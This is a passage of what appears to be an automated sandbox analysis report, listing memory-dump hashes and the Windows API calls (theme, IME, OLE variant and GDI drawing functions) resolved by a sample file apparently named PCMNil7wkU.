                                                                                                    • Instruction ID: be6b004fe95cb4600ecc1a39d1d3d666930d9f22f9f9e3d3781f0905dd79058f
                                                                                                    • Opcode Fuzzy Hash: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
                                                                                                    • Instruction Fuzzy Hash: 18A011A080882202AA8033288C0223830C0A800A20FC88B80A8F8802E0EA2E223080AB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: F
                                                                                                    • API String ID: 0-1304234792
                                                                                                    • Opcode ID: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
                                                                                                    • Instruction ID: 5e48fc60367b24fb154d55e61e87c7a1839bb2f88fd0f5ea52e2f1a616d971ba
                                                                                                    • Opcode Fuzzy Hash: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
                                                                                                    • Instruction Fuzzy Hash: DC515471F046098BEB18DE5EC8D07AEB6E7ABC8314F54817DE509E7384EB74AE018B44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d4cd4ac750aaa4fdc6fa5def1d1338f3c5baa6be6637f6278bb22647abcb1768
                                                                                                    • Instruction ID: 5f2d741675f5f3e4faae63713bd240272d0f38fc141cb2c7186a97a0a3829376
                                                                                                    • Opcode Fuzzy Hash: d4cd4ac750aaa4fdc6fa5def1d1338f3c5baa6be6637f6278bb22647abcb1768
                                                                                                    • Instruction Fuzzy Hash: EAF14071E00219AFEF04AEA9CCC5BEEBBB9EF84314F158058F515B7281DB7469118FA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
                                                                                                    • Instruction ID: 0b4a86eff77721065ed640801840ea150ef2152efc757085f5f46ea710ed6d8e
                                                                                                    • Opcode Fuzzy Hash: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
                                                                                                    • Instruction Fuzzy Hash: 0FA1B231B00515AFEF08EE69CC84BBEB7B7DFC5314F14C169A4159B295EB34A901CAA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0412BAF7), ref: 0412B77A
                                                                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0412B792
                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0412B7A4
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0412B7B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0412B7C8
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0412B7DA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0412B7EC
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0412B7FE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0412B810
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0412B822
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0412B834
                                                                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0412B846
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0412B858
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0412B86A
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0412B87C
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0412B88E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0412B8A0
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0412B8B2
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0412B8C4
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0412B8D6
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0412B8E8
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0412B8FA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0412B90C
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0412B91E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0412B930
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0412B942
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0412B954
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0412B966
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0412B978
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0412B98A
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0412B99C
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0412B9AE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0412B9C0
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0412B9D2
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0412B9E4
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0412B9F6
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0412BA08
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0412BA1A
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0412BA2C
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0412BA3E
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0412BA50
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0412BA62
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0412BA74
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0412BA86
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0412BA98
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0412BAAA
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0412BABC
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0412BACE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                    • API String ID: 2238633743-2910565190
                                                                                                    • Opcode ID: f8681eeb9d33afa745261eac7ea0864dc050eb1fd99196d948e98791ef0e8e5e
                                                                                                    • Instruction ID: f25acba29438ffd9750fef6176dadda78e85c78bb9299cc961682e6f47792983
                                                                                                    • Opcode Fuzzy Hash: f8681eeb9d33afa745261eac7ea0864dc050eb1fd99196d948e98791ef0e8e5e
                                                                                                    • Instruction Fuzzy Hash: C9A19FB0B446A0AFEF40EFA6D9C5A6537E8EF067447404565E424CF244DBB8BCA8CF19
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 04147041
                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,0414718E,?,00008000), ref: 04147065
                                                                                                    • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 04147072
                                                                                                    • LoadLibraryA.KERNEL32(imm32.dll,00000000,0414718E,?,00008000), ref: 0414708E
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 041470B0
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 041470C5
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 041470DA
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 041470EF
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 04147104
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 04147119
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0414712E
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 04147143
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 04147158
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0414716D
                                                                                                    • SetErrorMode.KERNEL32(?,04147195,00008000), ref: 04147188
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                                    • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                    • API String ID: 3397921170-3950384806
                                                                                                    • Opcode ID: 0731b55eaa2f97070df1ac363e9f66757076f393af823d500bac5506cf1e6bf3
                                                                                                    • Instruction ID: e45c6308b530057472f78359440bcd876171faa0080ac4915ea5a6bebf1b2e86
                                                                                                    • Opcode Fuzzy Hash: 0731b55eaa2f97070df1ac363e9f66757076f393af823d500bac5506cf1e6bf3
                                                                                                    • Instruction Fuzzy Hash: 0431EAB1745390AFEB04EFB6A8C6A6937E9E784B44B008455F524C7180DBBDBC98CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0410E609
                                                                                                      • Part of subcall function 0410E5D4: GetProcAddress.KERNEL32(00000000), ref: 0410E5ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                    • API String ID: 1646373207-1918263038
                                                                                                    • Opcode ID: 4a73b23b03cf42d57ad572d64ea11fd273f50d415cf834675e4a8f0e9ff71781
                                                                                                    • Instruction ID: 28bba8692023ee6e5719af343f20c2c635e4a36fc40eee1b8153a1a242dd828d
                                                                                                    • Opcode Fuzzy Hash: 4a73b23b03cf42d57ad572d64ea11fd273f50d415cf834675e4a8f0e9ff71781
                                                                                                    • Instruction Fuzzy Hash: D5412D7164C3445A32287B6B76C0026B7D8DA44658364CC2BF414BAAC4EFF6FD86C72A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 041236F3
                                                                                                    • SelectObject.GDI32(?,?), ref: 04123708
                                                                                                    • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,04123778,?,?), ref: 0412374C
                                                                                                    • SelectObject.GDI32(?,?), ref: 04123766
                                                                                                    • DeleteObject.GDI32(?), ref: 04123772
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04123786
                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 041237A7
                                                                                                    • SelectObject.GDI32(?,?), ref: 041237BC
                                                                                                    • SelectPalette.GDI32(?,08080EC2,00000000), ref: 041237D0
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 041237E2
                                                                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 041237F7
                                                                                                    • SelectPalette.GDI32(?,08080EC2,000000FF), ref: 0412380D
                                                                                                    • RealizePalette.GDI32(?), ref: 04123819
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0412383B
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0412385D
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 04123865
                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 04123873
                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0412389F
                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 041238C4
                                                                                                    • SetTextColor.GDI32(?,?), ref: 041238CE
                                                                                                    • SetBkColor.GDI32(?,?), ref: 041238D8
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 041238EB
                                                                                                    • DeleteObject.GDI32(?), ref: 041238F4
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 04123916
                                                                                                    • DeleteDC.GDI32(?), ref: 0412391F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3976802218-0
                                                                                                    • Opcode ID: e430f888c528307eba0b56f7243b6ab1f7a4fa81c11933e07798fec3246fd4fc
                                                                                                    • Instruction ID: ad775d346e304830c7b4f75b6a817e8ddcad1408d32534b2e233e844694cb360
                                                                                                    • Opcode Fuzzy Hash: e430f888c528307eba0b56f7243b6ab1f7a4fa81c11933e07798fec3246fd4fc
                                                                                                    • Instruction Fuzzy Hash: 16816EB1A00219AFEB50EFA8CD85EAFB7FCEB0D614F114555FA18E7280C675AD108B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetObjectA.GDI32(?,00000054,?), ref: 04125667
                                                                                                    • GetDC.USER32(00000000), ref: 04125695
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 041256A6
                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 041256C1
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 041256DB
                                                                                                    • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 041256FD
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0412570B
                                                                                                    • SelectObject.GDI32(?), ref: 04125753
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 04125766
                                                                                                    • RealizePalette.GDI32(?), ref: 0412576F
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 0412577B
                                                                                                    • RealizePalette.GDI32(?), ref: 04125784
                                                                                                    • SetBkColor.GDI32(?), ref: 0412578E
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 041257B2
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 041257BC
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 041257CF
                                                                                                    • DeleteObject.GDI32 ref: 041257DB
                                                                                                    • DeleteDC.GDI32(?), ref: 041257F1
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0412580C
                                                                                                    • DeleteDC.GDI32(00000000), ref: 04125828
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 04125839
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 332224125-0
                                                                                                    • Opcode ID: dca497b5d939fbb2388df7e0ac6c066af0a6aa77e20f3d77935aecbd73ee27d5
                                                                                                    • Instruction ID: 800bb03911913136fd5a5ff018b7c5cc042dd0d0cc230b09e561d7a483a97d92
                                                                                                    • Opcode Fuzzy Hash: dca497b5d939fbb2388df7e0ac6c066af0a6aa77e20f3d77935aecbd73ee27d5
                                                                                                    • Instruction Fuzzy Hash: F151FE71E40219BBEB10EBE8CDC5BAEB7FDEB08704F108455B614E7180D7B4A9508B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 04126642
                                                                                                    • CreateCompatibleDC.GDI32(00000001), ref: 041266A7
                                                                                                    • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 041266BC
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 041266C6
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 041266F6
                                                                                                    • RealizePalette.GDI32(?), ref: 04126702
                                                                                                    • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 04126726
                                                                                                    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0412677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 04126734
                                                                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 04126766
                                                                                                    • SelectObject.GDI32(?,?), ref: 04126773
                                                                                                    • DeleteObject.GDI32(00000000), ref: 04126779
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                                                    • String ID: ($BM
                                                                                                    • API String ID: 2831685396-2980357723
                                                                                                    • Opcode ID: e6c226a01216163fbb9db91838cb4a8a6a13b00c3a75e7c9e43241dc3f001d02
                                                                                                    • Instruction ID: 6d159aabcf094639d883a596c934bd15046b0183896eb2577b46153081a7d983
                                                                                                    • Opcode Fuzzy Hash: e6c226a01216163fbb9db91838cb4a8a6a13b00c3a75e7c9e43241dc3f001d02
                                                                                                    • Instruction Fuzzy Hash: B0D13D70A002289FDF14DFA8C9D4BAEBBF5FF48304F0485A5E914EB294D774A950CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowDC.USER32(00000000), ref: 04142DBC
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 04142DDF
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 04142DF1
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 04142E07
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 04142E1C
                                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,0414303B), ref: 04142E35
                                                                                                    • InflateRect.USER32(?,00000000,00000000), ref: 04142E53
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 04142E6D
                                                                                                    • DrawEdge.USER32(?,?,?,00000008), ref: 04142F6C
                                                                                                    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 04142F85
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 04142FAF
                                                                                                    • GetRgnBox.GDI32(?,?), ref: 04142FBE
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 04142FD4
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 04142FE5
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 04142FFA
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 04143016
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 04143035
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2490777911-0
                                                                                                    • Opcode ID: 4d3f1d30c3d494feefad93bf955d6e216e63f46b90515637c356eb12e8c59a42
                                                                                                    • Instruction ID: 240b01fbeb9224952615a3ed0a2e8660965ad569dc730a65ef23022191453902
                                                                                                    • Opcode Fuzzy Hash: 4d3f1d30c3d494feefad93bf955d6e216e63f46b90515637c356eb12e8c59a42
                                                                                                    • Instruction Fuzzy Hash: 0DA1D371E00108AFDB01DBA8C995EEEB7B9AF49308F1480A5F915FB291C775BE458B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0412614C: GetDC.USER32(00000000), ref: 041261A2
                                                                                                      • Part of subcall function 0412614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 041261B7
                                                                                                      • Part of subcall function 0412614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 041261C1
                                                                                                      • Part of subcall function 0412614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04124D0F,00000000,04124D9B), ref: 041261E5
